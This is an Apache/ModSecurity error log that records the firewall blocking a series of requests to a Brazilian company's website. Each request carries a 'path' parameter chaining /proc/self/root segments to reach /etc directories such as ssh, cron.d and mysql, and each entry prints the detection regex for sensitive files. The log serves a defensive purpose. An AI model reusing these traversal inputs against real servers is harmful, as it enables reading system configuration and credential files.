[Wed Mar 18 09:58:57.639421 2026] [:error] [pid 17887:tid 140411565680384] [client 74.7.243.128:58606] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqhkQkwaGbbGflqUZAH5gAAANU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:59:00.255559 2026] [:error] [pid 31803:tid 140411590858496] [client 74.7.243.128:58616] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqhlOyqAr6etmhZHNq3FwAAAFI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:59:11.500459 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.243.128:60966] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqhn9a6ubjKNq_cu4aRcgAAA0o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:59:19.455124 2026] [:error] [pid 19507:tid 140411582465792] [client 74.7.243.128:35692] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqhp9Y0UrI5A3LftIyc9gAAAZM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:59:20.551633 2026] [:error] [pid 15826:tid 140411699963648] [client 74.7.241.31:41644] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqhqOoXxyEfFpUF8f9mEgAAAUU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:59:20.835069 2026] [:error] [pid 17887:tid 140411741927168] [client 74.7.243.128:32892] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqhqAkwaGbbGflqUZAH9gAAAMA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:59:23.474964 2026] [:error] [pid 15051:tid 140411616036608] [client 74.7.243.128:32894] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqhqymAPhZkrhU8w4llBAAAAI8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:59:26.695623 2026] [:error] [pid 11816:tid 140411632822016] [client 74.7.243.128:32906] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqhruw_le52K8_3pV3XwAAAAg0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:59:56.778937 2026] [:error] [pid 29882:tid 140411616036608] [client 74.7.241.31:52908] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqhzEzinOy1jxa1j4cMRgAAAQ8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:59:58.203595 2026] [:error] [pid 31803:tid 140411582465792] [client 74.7.243.128:32918] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqhzuyqAr6etmhZHNq3VAAAAFM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:00:00.799407 2026] [:error] [pid 11816:tid 140411699963648] [client 74.7.243.128:46434] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqh0Ow_le52K8_3pV3X1AAAAgU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:00:09.763452 2026] [:error] [pid 15051:tid 140411590858496] [client 74.7.243.128:59678] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqh2SmAPhZkrhU8w4llNQAAAJI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:00:13.391685 2026] [:error] [pid 19507:tid 140411565680384] [client 74.7.243.128:59688] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqh3dY0UrI5A3LftIydGAAAAZU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:00:24.127847 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.241.31:33430] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqh6Na6ubjKNq_cu4aRrwAAA1U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:00:25.443501 2026] [:error] [pid 15826:tid 140411708356352] [client 74.7.241.31:43832] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqh6eoXxyEfFpUF8f9mJwAAAUQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:00:52.595141 2026] [:error] [pid 29882:tid 140411565680384] [client 74.7.243.128:59690] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqiBEzinOy1jxa1j4cMeAAAARU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:00:53.912941 2026] [:error] [pid 11816:tid 140411565680384] [client 74.7.243.128:60040] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqiBew_le52K8_3pV3X7gAAAhU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:01:15.576565 2026] [:error] [pid 15051:tid 140411624429312] [client 74.7.243.128:60044] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqiGymAPhZkrhU8w4llZAAAAI4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:01:16.867013 2026] [:error] [pid 19507:tid 140411548894976] [client 74.7.243.128:55782] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqiHNY0UrI5A3LftIydTQAAAZc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:01:20.387192 2026] [:error] [pid 17887:tid 140411691570944] [client 74.7.241.31:43846] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqiIAkwaGbbGflqUZAITgAAAMY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:01:21.915673 2026] [:error] [pid 11816:tid 140411741927168] [client 74.7.243.128:55786] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqiIew_le52K8_3pV3X_gAAAgA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
